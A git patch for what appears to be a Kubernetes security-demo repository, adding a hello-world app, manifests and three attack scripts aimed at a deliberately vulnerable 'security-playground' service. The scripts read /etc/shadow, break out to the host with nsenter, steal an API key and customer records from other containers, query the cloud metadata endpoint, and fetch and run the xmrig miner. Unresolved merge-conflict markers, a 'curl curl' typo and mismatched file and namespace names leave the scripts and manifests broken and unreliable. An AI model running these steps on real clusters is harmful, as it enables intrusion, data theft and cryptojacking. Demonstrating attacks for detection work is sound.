From ec4d8fb202b9b31a288260f89ffbb9345e6f36fe Mon Sep 17 00:00:00 2001 From: Jason Umiker Date: Mon, 31 Jul 2023 13:49:45 +1000 Subject: [PATCH] Merge branch 'main' of https://github.com/jasonumiker-sysdig/example-scenarios --- docker-build-hello-app/Dockerfile | 26 ++++++++++ docker-build-hello-app/README.md | 1 + docker-build-hello-app/build.sh | 10 ++++ docker-build-hello-app/main.go | 54 +++++++++++++++++++ example-curls-nodrift.sh | 76 ++++++++++++++++++++++++++- example-curls-restricted.sh | 76 ++++++++++++++++++++++++++- example-curls.sh | 76 ++++++++++++++++++++++++++- hello-clients.yaml | 86 +++++++++++++++++++++++++++++++ hello-server.yaml | 55 ++++++++++++++++++++ kustomization.yaml | 9 ++++ 10 files changed, 466 insertions(+), 3 deletions(-) create mode 100644 docker-build-hello-app/Dockerfile create mode 100644 docker-build-hello-app/README.md create mode 100755 docker-build-hello-app/build.sh create mode 100644 docker-build-hello-app/main.go create mode 100644 hello-clients.yaml create mode 100644 hello-server.yaml create mode 100644 kustomization.yaml diff --git a/docker-build-hello-app/Dockerfile b/docker-build-hello-app/Dockerfile new file mode 100644 index 0000000..30286db --- /dev/null +++ b/docker-build-hello-app/Dockerfile @@ -0,0 +1,26 @@ +# Copyright 2022 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +FROM golang:1.20.4 as builder +WORKDIR /app +RUN go mod init hello-app +COPY *.go ./ +RUN CGO_ENABLED=0 GOOS=linux go build -o /hello-app + +FROM gcr.io/distroless/base-debian11 +WORKDIR / +COPY --from=builder /hello-app /hello-app +ENV PORT 8080 +USER nonroot:nonroot +CMD ["/hello-app"] \ No newline at end of file diff --git a/docker-build-hello-app/README.md b/docker-build-hello-app/README.md new file mode 100644 index 0000000..265b281 --- /dev/null +++ b/docker-build-hello-app/README.md @@ -0,0 +1 @@ +Cloned from https://github.com/GoogleCloudPlatform/kubernetes-engine-samples/tree/main/hello-app \ No newline at end of file diff --git a/docker-build-hello-app/build.sh b/docker-build-hello-app/build.sh new file mode 100755 index 0000000..c54bcf2 --- /dev/null +++ b/docker-build-hello-app/build.sh @@ -0,0 +1,10 @@ +docker buildx create --name mybuilder --bootstrap --use +docker buildx build --push \ + --platform linux/arm64,linux/amd64 \ + --tag jasonumiker/hello-app:190523 \ + . +docker buildx build --push \ + --platform linux/arm64,linux/amd64 \ + --tag jasonumiker/hello-app:latest \ + . +docker buildx rm mybuilder \ No newline at end of file diff --git a/docker-build-hello-app/main.go b/docker-build-hello-app/main.go new file mode 100644 index 0000000..e4f6b40 --- /dev/null +++ b/docker-build-hello-app/main.go @@ -0,0 +1,54 @@ +/** + * Copyright 2021 Google Inc. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +// [START gke_hello_app] +// [START container_hello_app] +package main + +import ( + "fmt" + "log" + "net/http" + "os" +) + +func main() { + // register hello function to handle all requests + mux := http.NewServeMux() + mux.HandleFunc("/", hello) + + // use PORT environment variable, or default to 8080 + port := os.Getenv("PORT") + if port == "" { + port = "8080" + } + + // start the web server on port and accept requests + log.Printf("Server listening on port %s", port) + log.Fatal(http.ListenAndServe(":"+port, mux)) +} + +// hello responds to the request with a plain-text "Hello, world" message. +func hello(w http.ResponseWriter, r *http.Request) { + log.Printf("Serving request: %s", r.URL.Path) + host, _ := os.Hostname() + fmt.Fprintf(w, "Hello, world!\n") + fmt.Fprintf(w, "Version: 1.0.0\n") + fmt.Fprintf(w, "Hostname: %s\n", host) +} + +// [END container_hello_app] +// [END gke_hello_app] \ No newline at end of file diff --git a/example-curls-nodrift.sh b/example-curls-nodrift.sh index 404102b..4f83410 100755 --- a/example-curls-nodrift.sh +++ b/example-curls-nodrift.sh @@ -1,44 +1,118 @@ -#!/bin/bash +#!/usr/bin/env bash # Script to demonstrate how to interact with security-playground NODE_IP=$(kubectl get nodes -o wide | awk 'FNR == 2 {print $6}') NODE_PORT=30002 +HELLO_NAMESPACE=hello +<<<<<<< HEAD +# Try to reach hello-server for our NetworkPolicy example later +curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=curl http://hello-server.$HELLO_NAMESPACE.svc:8080" > /dev/null + +echo "1. Read a sensitive file (/etc/shadow)" +echo "--------------------------------------------------------------------------------" +======= echo "1. Read a sensitive file (/etc/shadow)" +>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7 curl $NODE_IP:$NODE_PORT/etc/shadow +echo "--------------------------------------------------------------------------------" +sleep 10 + echo "2. Exploit writing to /bin" +echo "--------------------------------------------------------------------------------" curl -X POST $NODE_IP:$NODE_PORT/bin/hello -d 'content=echo "hello-world"' echo "" echo "and then set it to be executable" curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 /bin/hello' echo "and then run it" curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=hello' +echo "--------------------------------------------------------------------------------" +sleep 10 echo "3. Install nmap from apt and then run a scan" +<<<<<<< HEAD +echo "--------------------------------------------------------------------------------" +======= +>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=apt-get update; apt-get -y install nmap;nmap -v scanme.nmap.org' +echo "--------------------------------------------------------------------------------" +sleep 10 echo "4. Break out of our Linux namespace to the host's with nsenter and install crictl in /usr/bin" +<<<<<<< HEAD +echo "--------------------------------------------------------------------------------" +ARCH=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=dpkg --print-architecture') +curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 wget -q https://github.com/kubernetes-sigs/cri-tools/releases/download/v1.27.1/crictl-v1.27.1-linux-$ARCH.tar.gz" +curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 tar -zxvf crictl-v1.27.1-linux-$ARCH.tar.gz -C /usr/bin" +echo "--------------------------------------------------------------------------------" +sleep 10 + +echo "5. Break out of our Linux namespace to the host's with nsenter and talk directly to the container runtime" +echo "--------------------------------------------------------------------------------" +======= ARCH=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=dpkg --print-architecture') curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 wget -q https://github.com/kubernetes-sigs/cri-tools/releases/download/v1.26.1/crictl-v1.26.1-linux-$ARCH.tar.gz" curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 tar -zxvf crictl-v1.26.1-linux-$ARCH.tar.gz -C /usr/bin" echo "5. Break out of our Linux namespace to the host's with nsenter and talk directly to the container runtime" +>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps' +echo "--------------------------------------------------------------------------------" +sleep 10 +<<<<<<< HEAD +echo "6. Steal a secret from another container on the same Node (hello-client in the $HELLO_NAMESPACE Namespace)" +echo "--------------------------------------------------------------------------------" +HELLO_ID=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps --name hello-client -q') +HELLO_ID_1=`echo "${HELLO_ID}" | head -1` +curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $HELLO_ID_1 /bin/sh -c set" | grep API_KEY +echo "--------------------------------------------------------------------------------" +sleep 10 + +echo "7. Exfil some data from another container running on the same Node" +echo "--------------------------------------------------------------------------------" +======= echo "6. Steal a secret from another container on the same Node (hello-client-allowed in the team1 Namespace)" HELLO_ID=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps --name hello-client-allowed -q') curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $HELLO_ID /bin/sh -c set" | grep API_KEY echo "7. Exfil some data from another container running on the same Node" +>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7 POSTGRES_ID=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps --name postgres-sakila -q') curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $POSTGRES_ID psql -U postgres -c 'SELECT c.first_name, c.last_name, c.email, a.address, a.postal_code FROM customer c JOIN address a ON (c.address_id = a.address_id)'" +echo "--------------------------------------------------------------------------------" +sleep 10 + +<<<<<<< HEAD +echo "8. Call the Kubernetes API via security-playground's K8s ServiceAccount" +echo "--------------------------------------------------------------------------------" +curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=curl -O https://s3.us-west-2.amazonaws.com/amazon-eks/1.27.1/2023-04-19/bin/linux/$ARCH/kubectl" +curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 ./kubectl' +curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=./kubectl create deployment nefarious-workload --image=public.ecr.aws/m9h2b5e7/security-playground:270723' +curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=./kubectl get pods' +echo "--------------------------------------------------------------------------------" +sleep 10 +echo "9. Call the Node's Instance Metadata Endpoint from the security-playground container" +echo "--------------------------------------------------------------------------------" +curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=curl curl http://169.254.169.254/latest/meta-data/iam/info' +echo "--------------------------------------------------------------------------------" +sleep 10 + +echo "10. Download and run a common crypto miner (xmrig)" +echo "--------------------------------------------------------------------------------" +======= echo "8. Download and run a common crypto miner (xmrig)" +>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7 if [[ "$ARCH" == "amd64" ]]; then curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget https://github.com/xmrig/xmrig/releases/download/v6.20.0/xmrig-6.20.0-linux-static-x64.tar.gz -O xmrig.tar.gz" else curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget https://z9k65lokhn70.s3.amazonaws.com/xmrig-6.20.0-linux-static-arm64.tar.gz -O xmrig.tar.gz" fi curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=tar -xzvf xmrig.tar.gz' +<<<<<<< HEAD +curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=xmrig-6.20.0/xmrig' +======= curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=xmrig-6.20.0/xmrig' +>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7 diff --git a/example-curls-restricted.sh b/example-curls-restricted.sh index f677d5b..9358a18 100755 --- a/example-curls-restricted.sh +++ b/example-curls-restricted.sh @@ -1,44 +1,118 @@ -#!/bin/bash +#!/usr/bin/env bash # Script to demonstrate how to interact with security-playground NODE_IP=$(kubectl get nodes -o wide | awk 'FNR == 2 {print $6}') NODE_PORT=30001 +HELLO_NAMESPACE=hello +<<<<<<< HEAD +# Try to reach hello-server for our NetworkPolicy example later +curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=curl http://hello-server.$HELLO_NAMESPACE.svc:8080" > /dev/null + +echo "1. Read a sensitive file (/etc/shadow)" +echo "--------------------------------------------------------------------------------" +======= echo "1. Read a sensitive file (/etc/shadow)" +>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7 curl $NODE_IP:$NODE_PORT/etc/shadow +echo "--------------------------------------------------------------------------------" +sleep 10 + echo "2. Exploit writing to /bin" +echo "--------------------------------------------------------------------------------" curl -X POST $NODE_IP:$NODE_PORT/bin/hello -d 'content=echo "hello-world"' echo "" echo "and then set it to be executable" curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 /bin/hello' echo "and then run it" curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=hello' +echo "--------------------------------------------------------------------------------" +sleep 10 echo "3. Install nmap from apt and then run a scan" +<<<<<<< HEAD +echo "--------------------------------------------------------------------------------" +======= +>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=apt-get update; apt-get -y install nmap;nmap -v scanme.nmap.org' +echo "--------------------------------------------------------------------------------" +sleep 10 echo "4. Break out of our Linux namespace to the host's with nsenter and install crictl in /usr/bin" +<<<<<<< HEAD +echo "--------------------------------------------------------------------------------" +ARCH=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=dpkg --print-architecture') +curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 wget -q https://github.com/kubernetes-sigs/cri-tools/releases/download/v1.27.1/crictl-v1.27.1-linux-$ARCH.tar.gz" +curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 tar -zxvf crictl-v1.27.1-linux-$ARCH.tar.gz -C /usr/bin" +echo "--------------------------------------------------------------------------------" +sleep 10 + +echo "5. Break out of our Linux namespace to the host's with nsenter and talk directly to the container runtime" +echo "--------------------------------------------------------------------------------" +======= ARCH=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=dpkg --print-architecture') curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 wget -q https://github.com/kubernetes-sigs/cri-tools/releases/download/v1.26.1/crictl-v1.26.1-linux-$ARCH.tar.gz" curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 tar -zxvf crictl-v1.26.1-linux-$ARCH.tar.gz -C /usr/bin" echo "5. Break out of our Linux namespace to the host's with nsenter and talk directly to the container runtime" +>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps' +echo "--------------------------------------------------------------------------------" +sleep 10 +<<<<<<< HEAD +echo "6. Steal a secret from another container on the same Node (hello-client in the $HELLO_NAMESPACE Namespace)" +echo "--------------------------------------------------------------------------------" +HELLO_ID=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps --name hello-client -q') +HELLO_ID_1=`echo "${HELLO_ID}" | head -1` +curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $HELLO_ID_1 /bin/sh -c set" | grep API_KEY +echo "--------------------------------------------------------------------------------" +sleep 10 + +echo "7. Exfil some data from another container running on the same Node" +echo "--------------------------------------------------------------------------------" +======= echo "6. Steal a secret from another container on the same Node (hello-client-allowed in the team1 Namespace)" HELLO_ID=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps --name hello-client-allowed -q') curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $HELLO_ID /bin/sh -c set" | grep API_KEY echo "7. Exfil some data from another container running on the same Node" +>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7 POSTGRES_ID=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps --name postgres-sakila -q') curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $POSTGRES_ID psql -U postgres -c 'SELECT c.first_name, c.last_name, c.email, a.address, a.postal_code FROM customer c JOIN address a ON (c.address_id = a.address_id)'" +echo "--------------------------------------------------------------------------------" +sleep 10 + +<<<<<<< HEAD +echo "8. Call the Kubernetes API via security-playground's K8s ServiceAccount" +echo "--------------------------------------------------------------------------------" +curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=curl -O https://s3.us-west-2.amazonaws.com/amazon-eks/1.27.1/2023-04-19/bin/linux/$ARCH/kubectl" +curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 ./kubectl' +curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=./kubectl create deployment nefarious-workload --image=public.ecr.aws/m9h2b5e7/security-playground:270723' +curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=./kubectl get pods' +echo "--------------------------------------------------------------------------------" +sleep 10 +echo "9. Call the Node's Instance Metadata Endpoint from the security-playground container" +echo "--------------------------------------------------------------------------------" +curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=curl curl http://169.254.169.254/latest/meta-data/iam/info' +echo "--------------------------------------------------------------------------------" +sleep 10 + +echo "10. Download and run a common crypto miner (xmrig)" +echo "--------------------------------------------------------------------------------" +======= echo "8. Download and run a common crypto miner (xmrig)" +>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7 if [[ "$ARCH" == "amd64" ]]; then curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget https://github.com/xmrig/xmrig/releases/download/v6.20.0/xmrig-6.20.0-linux-static-x64.tar.gz -O xmrig.tar.gz" else curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget https://z9k65lokhn70.s3.amazonaws.com/xmrig-6.20.0-linux-static-arm64.tar.gz -O xmrig.tar.gz" fi curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=tar -xzvf xmrig.tar.gz' +<<<<<<< HEAD +curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=xmrig-6.20.0/xmrig' +======= curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=xmrig-6.20.0/xmrig' +>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7 diff --git a/example-curls.sh b/example-curls.sh index 7e2d074..1e5325c 100755 --- a/example-curls.sh +++ b/example-curls.sh @@ -1,44 +1,118 @@ -#!/bin/bash +#!/usr/bin/env bash # Script to demonstrate how to interact with security-playground NODE_IP=$(kubectl get nodes -o wide | awk 'FNR == 2 {print $6}') NODE_PORT=30000 +HELLO_NAMESPACE=hello +<<<<<<< HEAD +# Try to reach hello-server for our NetworkPolicy example later +curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=curl http://hello-server.$HELLO_NAMESPACE.svc:8080" > /dev/null + +echo "1. Read a sensitive file (/etc/shadow)" +echo "--------------------------------------------------------------------------------" +======= echo "1. Read a sensitive file (/etc/shadow)" +>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7 curl $NODE_IP:$NODE_PORT/etc/shadow +echo "--------------------------------------------------------------------------------" +sleep 10 + echo "2. Exploit writing to /bin" +echo "--------------------------------------------------------------------------------" curl -X POST $NODE_IP:$NODE_PORT/bin/hello -d 'content=echo "hello-world"' echo "" echo "and then set it to be executable" curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 /bin/hello' echo "and then run it" curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=hello' +echo "--------------------------------------------------------------------------------" +sleep 10 echo "3. Install nmap from apt and then run a scan" +<<<<<<< HEAD +echo "--------------------------------------------------------------------------------" +======= +>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=apt-get update; apt-get -y install nmap;nmap -v scanme.nmap.org' +echo "--------------------------------------------------------------------------------" +sleep 10 echo "4. Break out of our Linux namespace to the host's with nsenter and install crictl in /usr/bin" +<<<<<<< HEAD +echo "--------------------------------------------------------------------------------" +ARCH=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=dpkg --print-architecture') +curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 wget -q https://github.com/kubernetes-sigs/cri-tools/releases/download/v1.27.1/crictl-v1.27.1-linux-$ARCH.tar.gz" +curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 tar -zxvf crictl-v1.27.1-linux-$ARCH.tar.gz -C /usr/bin" +echo "--------------------------------------------------------------------------------" +sleep 10 + +echo "5. Break out of our Linux namespace to the host's with nsenter and talk directly to the container runtime" +echo "--------------------------------------------------------------------------------" +======= ARCH=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=dpkg --print-architecture') curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 wget -q https://github.com/kubernetes-sigs/cri-tools/releases/download/v1.26.1/crictl-v1.26.1-linux-$ARCH.tar.gz" curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 tar -zxvf crictl-v1.26.1-linux-$ARCH.tar.gz -C /usr/bin" echo "5. Break out of our Linux namespace to the host's with nsenter and talk directly to the container runtime" +>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps' +echo "--------------------------------------------------------------------------------" +sleep 10 +<<<<<<< HEAD +echo "6. Steal a secret from another container on the same Node (hello-client in the $HELLO_NAMESPACE Namespace)" +echo "--------------------------------------------------------------------------------" +HELLO_ID=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps --name hello-client -q') +HELLO_ID_1=`echo "${HELLO_ID}" | head -1` +curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $HELLO_ID_1 /bin/sh -c set" | grep API_KEY +echo "--------------------------------------------------------------------------------" +sleep 10 + +echo "7. Exfil some data from another container running on the same Node" +echo "--------------------------------------------------------------------------------" +======= echo "6. Steal a secret from another container on the same Node (hello-client-allowed in the team1 Namespace)" HELLO_ID=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps --name hello-client-allowed -q') curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $HELLO_ID /bin/sh -c set" | grep API_KEY echo "7. Exfil some data from another container running on the same Node" +>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7 POSTGRES_ID=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps --name postgres-sakila -q') curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $POSTGRES_ID psql -U postgres -c 'SELECT c.first_name, c.last_name, c.email, a.address, a.postal_code FROM customer c JOIN address a ON (c.address_id = a.address_id)'" +echo "--------------------------------------------------------------------------------" +sleep 10 + +<<<<<<< HEAD +echo "8. Call the Kubernetes API via security-playground's K8s ServiceAccount" +echo "--------------------------------------------------------------------------------" +curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=curl -O https://s3.us-west-2.amazonaws.com/amazon-eks/1.27.1/2023-04-19/bin/linux/$ARCH/kubectl" +curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 ./kubectl' +curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=./kubectl create deployment nefarious-workload --image=public.ecr.aws/m9h2b5e7/security-playground:270723' +curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=./kubectl get pods' +echo "--------------------------------------------------------------------------------" +sleep 10 +echo "9. Call the Node's Instance Metadata Endpoint from the security-playground container" +echo "--------------------------------------------------------------------------------" +curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=curl curl http://169.254.169.254/latest/meta-data/iam/info' +echo "--------------------------------------------------------------------------------" +sleep 10 + +echo "10. Download and run a common crypto miner (xmrig)" +echo "--------------------------------------------------------------------------------" +======= echo "8. Download and run a common crypto miner (xmrig)" +>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7 if [[ "$ARCH" == "amd64" ]]; then curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget https://github.com/xmrig/xmrig/releases/download/v6.20.0/xmrig-6.20.0-linux-static-x64.tar.gz -O xmrig.tar.gz" else curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget https://z9k65lokhn70.s3.amazonaws.com/xmrig-6.20.0-linux-static-arm64.tar.gz -O xmrig.tar.gz" fi curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=tar -xzvf xmrig.tar.gz' +<<<<<<< HEAD +curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=xmrig-6.20.0/xmrig' +======= curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=xmrig-6.20.0/xmrig' +>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7 diff --git a/hello-clients.yaml b/hello-clients.yaml new file mode 100644 index 0000000..4477343 --- /dev/null +++ b/hello-clients.yaml @@ -0,0 +1,86 @@ +apiVersion: v1 +data: + API_KEY: c3VwZXJzZWNyZXRhcGlrZXk= +kind: Secret +metadata: + name: hello-secret + namespace: hello +type: Opaque +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + labels: + app: hello + name: hello-client + namespace: hello +spec: + replicas: 1 + selector: + matchLabels: + app: hello + template: + metadata: + labels: + app: hello + spec: + automountServiceAccountToken: false + containers: + - image: alpine:3.18.2 + name: hello-client + command: ["sh", "-c"] + args: ["while true; do wget -qO- --timeout=2 http://hello-server.team1.svc:8080; sleep 30; done"] + securityContext: + readOnlyRootFilesystem: true + env: + - name: API_KEY + valueFrom: + secretKeyRef: + name: hello-secret + key: API_KEY + resources: + requests: + memory: "256Mi" + cpu: "250m" + limits: + memory: "512Mi" + cpu: "500m" +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + labels: + app: not-hello + name: hello-client-blocked + namespace: hello +spec: + replicas: 1 + selector: + matchLabels: + app: not-hello + template: + metadata: + labels: + app: not-hello + spec: + automountServiceAccountToken: false + containers: + - image: alpine:3.18.2 + name: hello-client-blocked + command: ["sh", "-c"] + args: ["while true; do wget -qO- --timeout=2 http://hello-server.team1.svc:8080; sleep 30; done"] + securityContext: + readOnlyRootFilesystem: true + env: + - name: API_KEY + valueFrom: + secretKeyRef: + name: hello-secret + key: API_KEY + resources: + requests: + memory: "256Mi" + cpu: "250m" + limits: + memory: "512Mi" + cpu: "500m" \ No newline at end of file diff --git a/hello-server.yaml b/hello-server.yaml new file mode 100644 index 0000000..41f5c46 --- /dev/null +++ b/hello-server.yaml @@ -0,0 +1,55 @@ +apiVersion: v1 +kind: Namespace +metadata: + name: hello +--- +kind: Service +apiVersion: v1 +metadata: + labels: + app: hello-server + name: hello-server + namespace: hello +spec: + ports: + - port: 8080 + protocol: TCP + targetPort: 8080 + selector: + app: hello-server + sessionAffinity: None + type: ClusterIP +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + labels: + app: hello-server + name: hello-server + namespace: hello +spec: + replicas: 1 + selector: + matchLabels: + app: hello-server + template: + metadata: + labels: + app: hello-server + spec: + automountServiceAccountToken: false + containers: + - image: public.ecr.aws/m9h2b5e7/hello-app:270723 + name: hello-server + ports: + - containerPort: 8080 + protocol: TCP + securityContext: + readOnlyRootFilesystem: true + resources: + requests: + memory: "256Mi" + cpu: "250m" + limits: + memory: "512Mi" + cpu: "500m" diff --git a/kustomization.yaml b/kustomization.yaml new file mode 100644 index 0000000..26e6cf2 --- /dev/null +++ b/kustomization.yaml @@ -0,0 +1,9 @@ +apiVersion: kustomize.config.k8s.io/v1beta1 +kind: Kustomization +resources: + - postgres-sakila.yaml + - security-playground.yaml + - security-playground-restricted.yaml + - security-playground-nodrift.yaml + - hello-server.yaml + - hello-client.yaml